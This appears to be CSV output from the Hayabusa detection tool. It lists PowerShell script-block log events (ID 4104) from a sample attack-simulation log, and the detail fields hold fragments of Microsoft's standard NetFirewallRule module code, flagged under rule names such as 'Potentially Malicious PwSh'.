'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { 
$__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' -Alias '*' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) 
$__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { 
$__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' -Alias '*' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 